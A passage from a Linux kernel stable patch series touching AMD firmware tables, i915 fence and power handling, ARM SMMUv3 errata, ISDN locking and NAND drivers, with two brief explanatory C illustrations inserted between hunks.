++ *     driver reservation start address =  (start_address_in_kb - used_by_driver_in_kb)
++ *     Comment1[hchan]: There is only one reservation at the beginning of the FB reserved by
++ *     the host driver. The host driver would overwrite the table with the following:
++ *     used_by_firmware_in_kb = total reserved size for pf-vf info exchange,
++ *     set the SRIOV_MSG_SHARE_RESERVATION mask, and start_address_in_kb = 0
++ *   else there is no VBIOS reservation region:
++ *     driver must allocate driver reservation region at top of FB.
++ *     driver set used_by_driver_in_kb = driver reservation size
++ *     driver reservation start address =  (total_mem_size_in_kb - used_by_driver_in_kb)
++ *     same as Comment1
++ * else (NV1X and after):
++ *   if VBIOS/UEFI GOP is posted:
++ *     VBIOS/UEFIGOP update:
++ *       used_by_firmware_in_kb = atom_firmware_Info_v3_3.fw_reserved_size_in_kb;
++ *       start_address_in_kb = total_mem_size_in_kb - used_by_firmware_in_kb;
++ *       (total_mem_size_in_kb = reg(CONFIG_MEMSIZE)<<10)
++ *   if vram_usagebyfirmwareTable version <= 2.1:
++ *     driver can allocate driver reservation region under firmware reservation,
++ *     driver set used_by_driver_in_kb = driver reservation size
++ *     driver reservation start address = start_address_in_kb - used_by_driver_in_kb
++ *     same as Comment1
++ *   else driver can:
++ *     allocate its reservation anywhere, as long as it does not overlap the pre-OS FW reservation area
++ *     set used_by_driver_region0_in_kb = driver reservation size
++ *     set driver_region0_start_address_in_kb =  driver reservation region start address
++ *     Comment2[hchan]: Host driver can set used_by_firmware_in_kb and start_address_in_kb to
++ *     zero, since the reservation for the VF does not exist.  The host driver should also
++ *     update atom_firmware_Info table to remove the same VBIOS reservation as well.
++ */
+ 
+ struct vram_usagebyfirmware_v2_1
+ {
+-  struct  atom_common_table_header  table_header;
+-  uint32_t  start_address_in_kb;
+-  uint16_t  used_by_firmware_in_kb;
+-  uint16_t  used_by_driver_in_kb; 
++	struct  atom_common_table_header  table_header;
++	uint32_t  start_address_in_kb;
++	uint16_t  used_by_firmware_in_kb;
++	uint16_t  used_by_driver_in_kb;
+ };
+ 
++struct vram_usagebyfirmware_v2_2 {
++	struct  atom_common_table_header  table_header;
++	uint32_t  fw_region_start_address_in_kb;
++	uint16_t  used_by_firmware_in_kb;
++	uint16_t  reserved;
++	uint32_t  driver_region0_start_address_in_kb;
++	uint32_t  used_by_driver_region0_in_kb;
++	uint32_t  reserved32[7];
++};
+ 
+ /* 
+   ***************************************************************************
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index da9b995b54c8f..96e679a176e94 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7123,8 +7123,6 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
+-	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
+-
+ 	if (!modeset &&
+ 	    (new_crtc_state->uapi.color_mgmt_changed ||
+ 	     new_crtc_state->update_pipe))
+@@ -7501,28 +7499,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	/*
+-	 * During full modesets we write a lot of registers, wait
+-	 * for PLLs, etc. Doing that while DC states are enabled
+-	 * is not a good idea.
+-	 *
+-	 * During fastsets and other updates we also need to
+-	 * disable DC states due to the following scenario:
+-	 * 1. DC5 exit and PSR exit happen
+-	 * 2. Some or all _noarm() registers are written
+-	 * 3. Due to some long delay PSR is re-entered
+-	 * 4. DC5 entry -> DMC saves the already written new
+-	 *    _noarm() registers and the old not yet written
+-	 *    _arm() registers
+-	 * 5. DC5 exit -> DMC restores a mixture of old and
+-	 *    new register values and arms the update
+-	 * 6. PSR exit -> hardware latches a mixture of old and
+-	 *    new register values -> corrupted frame, or worse
+-	 * 7. New _arm() registers are finally written
+-	 * 8. Hardware finally latches a complete set of new
+-	 *    register values, and subsequent frames will be OK again
+-	 */
+-	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
++	if (state->modeset)
++		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7661,8 +7639,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
++		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
+-	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+index e49fa6fa6aee1..b2838732ac936 100644
+--- a/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/gen8_engine_cs.c
+@@ -256,8 +256,8 @@ int gen12_emit_flush_rcs(struct i915_request *rq, u32 mode)
+ 
+ 		if (!HAS_FLAT_CCS(rq->engine->i915)) {
+ 			/* hsdes: 1809175790 */
+-			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_GFX_CCS_AUX_NV);
++			cs = gen12_emit_aux_table_inv(rq->engine->gt, cs,
++						      GEN12_CCS_AUX_INV);
+ 		}
+ 
+ 		*cs++ = preparser_disable(false);
+@@ -317,10 +317,10 @@ int gen12_emit_flush_xcs(struct i915_request *rq, u32 mode)
+ 	if (aux_inv) { /* hsdes: 1809175790 */
+ 		if (rq->engine->class == VIDEO_DECODE_CLASS)
+ 			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VD0_AUX_NV);
++						      cs, GEN12_VD0_AUX_INV);
+ 		else
+ 			cs = gen12_emit_aux_table_inv(rq->engine->gt,
+-						      cs, GEN12_VE0_AUX_NV);
++						      cs, GEN12_VE0_AUX_INV);
+ 	}
+ 
+ 	if (mode & EMIT_INVALIDATE)
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index 2275ee47da955..dd006563cc81e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -301,9 +301,11 @@
+ #define GEN8_PRIVATE_PAT_HI			_MMIO(0x40e0 + 4)
+ #define GEN10_PAT_INDEX(index)			_MMIO(0x40e0 + (index) * 4)
+ #define BSD_HWS_PGA_GEN7			_MMIO(0x4180)
+-#define GEN12_GFX_CCS_AUX_NV			_MMIO(0x4208)
+-#define GEN12_VD0_AUX_NV			_MMIO(0x4218)
+-#define GEN12_VD1_AUX_NV			_MMIO(0x4228)
++
++#define GEN12_CCS_AUX_INV			_MMIO(0x4208)
++#define GEN12_VD0_AUX_INV			_MMIO(0x4218)
++#define GEN12_VE0_AUX_INV			_MMIO(0x4238)
++#define GEN12_BCS0_AUX_INV			_MMIO(0x4248)
+ 
+ #define GEN8_RTCR				_MMIO(0x4260)
+ #define GEN8_M1TCR				_MMIO(0x4264)
+@@ -311,14 +313,12 @@
+ #define GEN8_BTCR				_MMIO(0x426c)
+ #define GEN8_VTCR				_MMIO(0x4270)
+ 
+-#define GEN12_VD2_AUX_NV			_MMIO(0x4298)
+-#define GEN12_VD3_AUX_NV			_MMIO(0x42a8)
+-#define GEN12_VE0_AUX_NV			_MMIO(0x4238)
+-
+ #define BLT_HWS_PGA_GEN7			_MMIO(0x4280)
+ 
+-#define GEN12_VE1_AUX_NV			_MMIO(0x42b8)
++#define GEN12_VD2_AUX_INV			_MMIO(0x4298)
++#define GEN12_CCS0_AUX_INV			_MMIO(0x42c8)
+ #define   AUX_INV				REG_BIT(0)
++
+ #define VEBOX_HWS_PGA_GEN7			_MMIO(0x4380)
+ 
+ #define GEN12_AUX_ERR_DBG			_MMIO(0x43f4)
+diff --git a/drivers/gpu/drm/i915/gt/intel_lrc.c b/drivers/gpu/drm/i915/gt/intel_lrc.c
+index 3955292483a6f..137e41e37ea54 100644
+--- a/drivers/gpu/drm/i915/gt/intel_lrc.c
++++ b/drivers/gpu/drm/i915/gt/intel_lrc.c
+@@ -1299,7 +1299,7 @@ gen12_emit_indirect_ctx_rcs(const struct intel_context *ce, u32 *cs)
+ 	/* hsdes: 1809175790 */
+ 	if (!HAS_FLAT_CCS(ce->engine->i915))
+ 		cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-					      cs, GEN12_GFX_CCS_AUX_NV);
++					      cs, GEN12_CCS_AUX_INV);
+ 
+ 	/* Wa_16014892111 */
+ 	if (IS_DG2(ce->engine->i915))
+@@ -1326,10 +1326,10 @@ gen12_emit_indirect_ctx_xcs(const struct intel_context *ce, u32 *cs)
+ 	if (!HAS_FLAT_CCS(ce->engine->i915)) {
+ 		if (ce->engine->class == VIDEO_DECODE_CLASS)
+ 			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VD0_AUX_NV);
++						      cs, GEN12_VD0_AUX_INV);
+ 		else if (ce->engine->class == VIDEO_ENHANCEMENT_CLASS)
+ 			cs = gen12_emit_aux_table_inv(ce->engine->gt,
+-						      cs, GEN12_VE0_AUX_NV);
++						      cs, GEN12_VE0_AUX_INV);
+ 	}
+ 
+ 	return cs;
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 8ef93889061a6..5ec293011d990 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -449,8 +449,11 @@ int i915_active_add_request(struct i915_active *ref, struct i915_request *rq)
+ 		}
+ 	} while (unlikely(is_barrier(active)));
+ 
+-	if (!__i915_active_fence_set(active, fence))
++	fence = __i915_active_fence_set(active, fence);
++	if (!fence)
+ 		__i915_active_acquire(ref);
++	else
++		dma_fence_put(fence);
+ 
+ out:
+ 	i915_active_release(ref);
+@@ -469,13 +472,9 @@ __i915_active_set_fence(struct i915_active *ref,
+ 		return NULL;
+ 	}
+ 
+-	rcu_read_lock();
+ 	prev = __i915_active_fence_set(active, fence);
+-	if (prev)
+-		prev = dma_fence_get_rcu(prev);
+-	else
++	if (!prev)
+ 		__i915_active_acquire(ref);
+-	rcu_read_unlock();
+ 
+ 	return prev;
+ }
+@@ -1019,10 +1018,11 @@ void i915_request_add_active_barriers(struct i915_request *rq)
+  *
+  * Records the new @fence as the last active fence along its timeline in
+  * this active tracker, moving the tracking callbacks from the previous
+- * fence onto this one. Returns the previous fence (if not already completed),
+- * which the caller must ensure is executed before the new fence. To ensure
+- * that the order of fences within the timeline of the i915_active_fence is
+- * understood, it should be locked by the caller.
++ * fence onto this one. Gets and returns a reference to the previous fence
++ * (if not already completed), which the caller must put after making sure
++ * that it is executed before the new fence. To ensure that the order of
++ * fences within the timeline of the i915_active_fence is understood, it
++ * should be locked by the caller.
+  */
+ struct dma_fence *
+ __i915_active_fence_set(struct i915_active_fence *active,
+@@ -1031,7 +1031,23 @@ __i915_active_fence_set(struct i915_active_fence *active,
+ 	struct dma_fence *prev;
+ 	unsigned long flags;
+ 
+-	if (fence == rcu_access_pointer(active->fence))
++	/*
++	 * In case of fences embedded in i915_requests, their memory is
++	 * SLAB_TYPESAFE_BY_RCU, so it can be reused right after release
++	 * by new requests.  There is then a risk of passing back a pointer
++	 * to a new, completely unrelated fence that reuses the same memory
++	 * while tracked under a different active tracker.  Combined with i915
++	 * perf open/close operations that build await dependencies between
++	 * engine kernel context requests and user requests from different
++	 * timelines, this can lead to dependency loops and infinite waits.
++	 *
++	 * As a countermeasure, we try to get a reference to the active->fence
++	 * first, so if we succeed and pass it back to our user then it is not
++	 * released and potentially reused by an unrelated request before the
++	 * user has a chance to set up an await dependency on it.
++	 */
++	prev = i915_active_fence_get(active);
++	if (fence == prev)
+ 		return fence;
+ 
+ 	GEM_BUG_ON(test_bit(DMA_FENCE_FLAG_SIGNALED_BIT, &fence->flags));
+@@ -1040,27 +1056,56 @@ __i915_active_fence_set(struct i915_active_fence *active,
+ 	 * Consider that we have two threads arriving (A and B), with
+ 	 * C already resident as the active->fence.
+ 	 *
+-	 * A does the xchg first, and so it sees C or NULL depending
+-	 * on the timing of the interrupt handler. If it is NULL, the
+-	 * previous fence must have been signaled and we know that
+-	 * we are first on the timeline. If it is still present,
+-	 * we acquire the lock on that fence and serialise with the interrupt
+-	 * handler, in the process removing it from any future interrupt
+-	 * callback. A will then wait on C before executing (if present).
+-	 *
+-	 * As B is second, it sees A as the previous fence and so waits for
+-	 * it to complete its transition and takes over the occupancy for
+-	 * itself -- remembering that it needs to wait on A before executing.
++	 * Both A and B have got a reference to C or NULL, depending on the
++	 * timing of the interrupt handler.  Let's assume that if A has got C
++	 * then it has locked C first (before B).
+ 	 *
+ 	 * Note the strong ordering of the timeline also provides consistent
+ 	 * nesting rules for the fence->lock; the inner lock is always the
+ 	 * older lock.
+ 	 */
+ 	spin_lock_irqsave(fence->lock, flags);
+-	prev = xchg(__active_fence_slot(active), fence);
+-	if (prev) {
+-		GEM_BUG_ON(prev == fence);
++	if (prev)
+ 		spin_lock_nested(prev->lock, SINGLE_DEPTH_NESTING);
++
++	/*
++	 * A does the cmpxchg first, and so it sees C or NULL, as before, or
++	 * something else, depending on the timing of other threads and/or
++	 * interrupt handler.  If not the same as before then A unlocks C if
++	 * applicable and retries, starting from an attempt to get a new
++	 * active->fence.  Meanwhile, B follows the same path as A.
++	 * Once A succeeds with cmpxchg, B fails again, retries, gets A from
++	 * active->fence, locks it as soon as A completes, and possibly
++	 * succeeds with cmpxchg.
++	 */
++	while (cmpxchg(__active_fence_slot(active), prev, fence) != prev) {
++		if (prev) {
++			spin_unlock(prev->lock);
++			dma_fence_put(prev);
++		}
++		spin_unlock_irqrestore(fence->lock, flags);
++
++		prev = i915_active_fence_get(active);
++		GEM_BUG_ON(prev == fence);
++
++		spin_lock_irqsave(fence->lock, flags);
++		if (prev)
++			spin_lock_nested(prev->lock, SINGLE_DEPTH_NESTING);
++	}
++
++	/*
++	 * If prev is NULL then the previous fence must have been signaled
++	 * and we know that we are first on the timeline.  If it is still
++	 * present then, having the lock on that fence already acquired, we
++	 * serialise with the interrupt handler, in the process of removing it
++	 * from any future interrupt callback.  A will then wait on C before
++	 * executing (if present).
++	 *
++	 * As B is second, it sees A as the previous fence and so waits for
++	 * it to complete its transition and takes over the occupancy for
++	 * itself -- remembering that it needs to wait on A before executing.
++	 */
++	if (prev) {
+ 		__list_del_entry(&active->cb.node);
+ 		spin_unlock(prev->lock); /* serialise with prev->cb_list */
+ 	}
+@@ -1077,11 +1122,7 @@ int i915_active_fence_set(struct i915_active_fence *active,
+ 	int err = 0;
+ 
+ 	/* Must maintain timeline ordering wrt previous active requests */
+-	rcu_read_lock();
+ 	fence = __i915_active_fence_set(active, &rq->fence);
+-	if (fence) /* but the previous fence may not belong to that timeline! */
+-		fence = dma_fence_get_rcu(fence);
+-	rcu_read_unlock();
+ 	if (fence) {
+ 		err = i915_request_await_dma_fence(rq, fence);
+ 		dma_fence_put(fence);
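
The heart of the fix is the shape of the update loop: take a reference to the currently published fence first, and only then try to swap it out, retrying when another thread won the race. A simplified C11 illustration of that structure (names are hypothetical; the real code additionally holds fence locks and relies on RCU-safe get semantics, which a plain refcount cannot capture):

#include <stdatomic.h>
#include <stdio.h>

struct fence {
	atomic_int refcount;
	int id;
};

static struct fence *fence_get(struct fence *f)
{
	if (f)
		atomic_fetch_add(&f->refcount, 1);
	return f;
}

static void fence_put(struct fence *f)
{
	if (f && atomic_fetch_sub(&f->refcount, 1) == 1)
		printf("fence %d: last reference dropped\n", f->id);
}

/* Publish a new fence and return the *referenced* previous one.  Taking
 * the reference before the compare-exchange is what keeps the returned
 * pointer from being recycled under the caller's feet. */
static struct fence *active_fence_set(struct fence *_Atomic *slot,
				      struct fence *fence)
{
	for (;;) {
		struct fence *prev = fence_get(atomic_load(slot));
		struct fence *expected = prev;

		if (atomic_compare_exchange_strong(slot, &expected, fence))
			return prev;	/* caller must fence_put() this */

		fence_put(prev);	/* lost the race: drop and retry */
	}
}

int main(void)
{
	static struct fence f1 = { .refcount = 1, .id = 1 };
	static struct fence f2 = { .refcount = 1, .id = 2 };
	struct fence *_Atomic slot = &f1;
	struct fence *prev;

	prev = active_fence_set(&slot, &f2);
	if (prev)
		fence_put(prev);	/* put the reference we were handed */
	return 0;
}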
+diff --git a/drivers/gpu/drm/i915/i915_request.c b/drivers/gpu/drm/i915/i915_request.c
+index 62fad16a55e84..803cd2ad4deb5 100644
+--- a/drivers/gpu/drm/i915/i915_request.c
++++ b/drivers/gpu/drm/i915/i915_request.c
+@@ -1647,6 +1647,11 @@ __i915_request_ensure_parallel_ordering(struct i915_request *rq,
+ 
+ 	request_to_parent(rq)->parallel.last_rq = i915_request_get(rq);
+ 
++	/*
++	 * Users have to put the reference potentially taken by
++	 * __i915_active_fence_set() on the returned request
++	 * when it is no longer needed.
++	 */
+ 	return to_request(__i915_active_fence_set(&timeline->last_request,
+ 						  &rq->fence));
+ }
+@@ -1693,6 +1698,10 @@ __i915_request_ensure_ordering(struct i915_request *rq,
+ 							 0);
+ 	}
+ 
++	/*
++	 * Users have to put the reference to prev potentially taken
++	 * by __i915_active_fence_set() when it is no longer needed.
++	 */
+ 	return prev;
+ }
+ 
+@@ -1736,6 +1745,8 @@ __i915_request_add_to_timeline(struct i915_request *rq)
+ 		prev = __i915_request_ensure_ordering(rq, timeline);
+ 	else
+ 		prev = __i915_request_ensure_parallel_ordering(rq, timeline);
++	if (prev)
++		i915_request_put(prev);
+ 
+ 	/*
+ 	 * Make sure that no request gazumped us - if it was allocated after
+diff --git a/drivers/gpu/drm/imx/ipuv3-crtc.c b/drivers/gpu/drm/imx/ipuv3-crtc.c
+index 5f26090b0c985..89585b31b985e 100644
+--- a/drivers/gpu/drm/imx/ipuv3-crtc.c
++++ b/drivers/gpu/drm/imx/ipuv3-crtc.c
+@@ -310,7 +310,7 @@ static void ipu_crtc_mode_set_nofb(struct drm_crtc *crtc)
+ 		dev_warn(ipu_crtc->dev, "8-pixel align hactive %d -> %d\n",
+ 			 sig_cfg.mode.hactive, new_hactive);
+ 
+-		sig_cfg.mode.hfront_porch = new_hactive - sig_cfg.mode.hactive;
++		sig_cfg.mode.hfront_porch -= new_hactive - sig_cfg.mode.hactive;
+ 		sig_cfg.mode.hactive = new_hactive;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index f7aeeee6f5266..db332de134f1c 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -552,7 +552,8 @@ static bool ttm_bo_evict_swapout_allowable(struct ttm_buffer_object *bo,
+ 
+ 	if (bo->pin_count) {
+ 		*locked = false;
+-		*busy = false;
++		if (busy)
++			*busy = false;
+ 		return false;
+ 	}
+ 
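
The added NULL check reflects a common convention: busy is an optional out-parameter that callers may pass as NULL when they only care about locked. A minimal standalone illustration of that convention (hypothetical names):

#include <stdbool.h>
#include <stdio.h>

static bool try_take(int pin_count, bool *locked, bool *busy)
{
	if (pin_count) {
		*locked = false;	/* mandatory out-parameter */
		if (busy)
			*busy = false;	/* optional: guard every store */
		return false;
	}
	*locked = true;
	if (busy)
		*busy = false;
	return true;
}

int main(void)
{
	bool locked;

	/* Callers that do not care about 'busy' may pass NULL. */
	printf("%d\n", try_take(1, &locked, NULL));
	return 0;
}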
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index d4d8bfee9febc..db33dc87f69ed 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -882,6 +882,12 @@ static void arm_smmu_cmdq_batch_add(struct arm_smmu_device *smmu,
+ {
+ 	int index;
+ 
++	if (cmds->num == CMDQ_BATCH_ENTRIES - 1 &&
++	    (smmu->options & ARM_SMMU_OPT_CMDQ_FORCE_SYNC)) {
++		arm_smmu_cmdq_issue_cmdlist(smmu, cmds->cmds, cmds->num, true);
++		cmds->num = 0;
++	}
++
+ 	if (cmds->num == CMDQ_BATCH_ENTRIES) {
+ 		arm_smmu_cmdq_issue_cmdlist(smmu, cmds->cmds, cmds->num, false);
+ 		cmds->num = 0;
+@@ -3410,6 +3416,44 @@ static int arm_smmu_device_reset(struct arm_smmu_device *smmu, bool bypass)
+ 	return 0;
+ }
+ 
++#define IIDR_IMPLEMENTER_ARM		0x43b
++#define IIDR_PRODUCTID_ARM_MMU_600	0x483
++#define IIDR_PRODUCTID_ARM_MMU_700	0x487
++
++static void arm_smmu_device_iidr_probe(struct arm_smmu_device *smmu)
++{
++	u32 reg;
++	unsigned int implementer, productid, variant, revision;
++
++	reg = readl_relaxed(smmu->base + ARM_SMMU_IIDR);
++	implementer = FIELD_GET(IIDR_IMPLEMENTER, reg);
++	productid = FIELD_GET(IIDR_PRODUCTID, reg);
++	variant = FIELD_GET(IIDR_VARIANT, reg);
++	revision = FIELD_GET(IIDR_REVISION, reg);
++
++	switch (implementer) {
++	case IIDR_IMPLEMENTER_ARM:
++		switch (productid) {
++		case IIDR_PRODUCTID_ARM_MMU_600:
++			/* Arm erratum 1076982 */
++			if (variant == 0 && revision <= 2)
++				smmu->features &= ~ARM_SMMU_FEAT_SEV;
++			/* Arm erratum 1209401 */
++			if (variant < 2)
++				smmu->features &= ~ARM_SMMU_FEAT_NESTING;
++			break;
++		case IIDR_PRODUCTID_ARM_MMU_700:
++			/* Arm erratum 2812531 */
++			smmu->features &= ~ARM_SMMU_FEAT_BTM;
++			smmu->options |= ARM_SMMU_OPT_CMDQ_FORCE_SYNC;
++			/* Arm errata 2268618, 2812531 */
++			smmu->features &= ~ARM_SMMU_FEAT_NESTING;
++			break;
++		}
++		break;
++	}
++}
++
+ static int arm_smmu_device_hw_probe(struct arm_smmu_device *smmu)
+ {
+ 	u32 reg;
+@@ -3615,6 +3659,12 @@ static int arm_smmu_device_hw_probe(struct arm_smmu_device *smmu)
+ 
+ 	smmu->ias = max(smmu->ias, smmu->oas);
+ 
++	if ((smmu->features & ARM_SMMU_FEAT_TRANS_S1) &&
++	    (smmu->features & ARM_SMMU_FEAT_TRANS_S2))
++		smmu->features |= ARM_SMMU_FEAT_NESTING;
++
++	arm_smmu_device_iidr_probe(smmu);
++
+ 	if (arm_smmu_sva_supported(smmu))
+ 		smmu->features |= ARM_SMMU_FEAT_SVA;
+ 
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
+index cd48590ada303..d0b207cae1071 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.h
+@@ -69,6 +69,12 @@
+ #define IDR5_VAX			GENMASK(11, 10)
+ #define IDR5_VAX_52_BIT			1
+ 
++#define ARM_SMMU_IIDR			0x18
++#define IIDR_PRODUCTID			GENMASK(31, 20)
++#define IIDR_VARIANT			GENMASK(19, 16)
++#define IIDR_REVISION			GENMASK(15, 12)
++#define IIDR_IMPLEMENTER		GENMASK(11, 0)
++
+ #define ARM_SMMU_CR0			0x20
+ #define CR0_ATSCHK			(1 << 4)
+ #define CR0_CMDQEN			(1 << 3)
+@@ -639,11 +645,13 @@ struct arm_smmu_device {
+ #define ARM_SMMU_FEAT_BTM		(1 << 16)
+ #define ARM_SMMU_FEAT_SVA		(1 << 17)
+ #define ARM_SMMU_FEAT_E2H		(1 << 18)
++#define ARM_SMMU_FEAT_NESTING		(1 << 19)
+ 	u32				features;
+ 
+ #define ARM_SMMU_OPT_SKIP_PREFETCH	(1 << 0)
+ #define ARM_SMMU_OPT_PAGE0_REGS_ONLY	(1 << 1)
+ #define ARM_SMMU_OPT_MSIPOLL		(1 << 2)
++#define ARM_SMMU_OPT_CMDQ_FORCE_SYNC	(1 << 3)
+ 	u32				options;
+ 
+ 	struct arm_smmu_cmdq		cmdq;
+diff --git a/drivers/isdn/hardware/mISDN/hfcpci.c b/drivers/isdn/hardware/mISDN/hfcpci.c
+index c0331b2680108..fe391de1aba32 100644
+--- a/drivers/isdn/hardware/mISDN/hfcpci.c
++++ b/drivers/isdn/hardware/mISDN/hfcpci.c
+@@ -839,7 +839,7 @@ hfcpci_fill_fifo(struct bchannel *bch)
+ 		*z1t = cpu_to_le16(new_z1);	/* now send data */
+ 		if (bch->tx_idx < bch->tx_skb->len)
+ 			return;
+-		dev_kfree_skb(bch->tx_skb);
++		dev_kfree_skb_any(bch->tx_skb);
+ 		if (get_next_bframe(bch))
+ 			goto next_t_frame;
+ 		return;
+@@ -895,7 +895,7 @@ hfcpci_fill_fifo(struct bchannel *bch)
+ 	}
+ 	bz->za[new_f1].z1 = cpu_to_le16(new_z1);	/* for next buffer */
+ 	bz->f1 = new_f1;	/* next frame */
+-	dev_kfree_skb(bch->tx_skb);
++	dev_kfree_skb_any(bch->tx_skb);
+ 	get_next_bframe(bch);
+ }
+ 
+@@ -1119,7 +1119,7 @@ tx_birq(struct bchannel *bch)
+ 	if (bch->tx_skb && bch->tx_idx < bch->tx_skb->len)
+ 		hfcpci_fill_fifo(bch);
+ 	else {
+-		dev_kfree_skb(bch->tx_skb);
++		dev_kfree_skb_any(bch->tx_skb);
+ 		if (get_next_bframe(bch))
+ 			hfcpci_fill_fifo(bch);
+ 	}
+@@ -2277,7 +2277,7 @@ _hfcpci_softirq(struct device *dev, void *unused)
+ 		return 0;
+ 
+ 	if (hc->hw.int_m2 & HFCPCI_IRQ_ENABLE) {
+-		spin_lock(&hc->lock);
++		spin_lock_irq(&hc->lock);
+ 		bch = Sel_BCS(hc, hc->hw.bswapped ? 2 : 1);
+ 		if (bch && bch->state == ISDN_P_B_RAW) { /* B1 rx&tx */
+ 			main_rec_hfcpci(bch);
+@@ -2288,7 +2288,7 @@ _hfcpci_softirq(struct device *dev, void *unused)
+ 			main_rec_hfcpci(bch);
+ 			tx_birq(bch);
+ 		}
+-		spin_unlock(&hc->lock);
++		spin_unlock_irq(&hc->lock);
+ 	}
+ 	return 0;
+ }
+diff --git a/drivers/mtd/nand/raw/fsl_upm.c b/drivers/mtd/nand/raw/fsl_upm.c
+index b3cc427100a22..636e65328bb32 100644
+--- a/drivers/mtd/nand/raw/fsl_upm.c
++++ b/drivers/mtd/nand/raw/fsl_upm.c
+@@ -135,7 +135,7 @@ static int fun_exec_op(struct nand_chip *chip, const struct nand_operation *op,
+ 	unsigned int i;
+ 	int ret;
+ 
+-	if (op->cs > NAND_MAX_CHIPS)
++	if (op->cs >= NAND_MAX_CHIPS)
+ 		return -EINVAL;
+ 
+ 	if (check_only)
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 029a2a302aa65..ac4947f720478 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -1184,7 +1184,6 @@ static int meson_nand_attach_chip(struct nand_chip *nand)
+ 	struct meson_nfc *nfc = nand_get_controller_data(nand);
+ 	struct meson_nfc_nand_chip *meson_chip = to_meson_nand(nand);
+ 	struct mtd_info *mtd = nand_to_mtd(nand);
+-	int nsectors = mtd->writesize / 1024;
+ 	int ret;
+ 
+ 	if (!mtd->name) {
+@@ -1202,7 +1201,7 @@ static int meson_nand_attach_chip(struct nand_chip *nand)
+ 	nand->options |= NAND_NO_SUBPAGE_WRITE;
+ 
+ 	ret = nand_ecc_choose_conf(nand, nfc->data->ecc_caps,
+-				   mtd->oobsize - 2 * nsectors);
++				   mtd->oobsize - 2);
+ 	if (ret) {
+ 		dev_err(nfc->dev, "failed to ECC init\n");
+ 		return -EINVAL;
+diff --git a/drivers/mtd/nand/raw/omap_elm.c b/drivers/mtd/nand/raw/omap_elm.c
+index 4796a48e1012a..22d37fc37e98a 100644
+--- a/drivers/mtd/nand/raw/omap_elm.c
++++ b/drivers/mtd/nand/raw/omap_elm.c
+@@ -177,17 +177,17 @@ static void elm_load_syndrome(struct elm_info *info,
+ 			switch (info->bch_type) {
+ 			case BCH8_ECC:
+ 				/* syndrome fragment 0 = ecc[9-12B] */
+-				val = cpu_to_be32(*(u32 *) &ecc[9]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[9]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 1 = ecc[5-8B] */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[5]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[5]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 2 = ecc[1-4B] */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[1]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[1]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 3 = ecc[0B] */
+@@ -197,35 +197,35 @@ static void elm_load_syndrome(struct elm_info *info,
+ 				break;
+ 			case BCH4_ECC:
+ 				/* syndrome fragment 0 = ecc[20-52b] bits */
+-				val = (cpu_to_be32(*(u32 *) &ecc[3]) >> 4) |
++				val = ((__force u32)cpu_to_be32(*(u32 *)&ecc[3]) >> 4) |
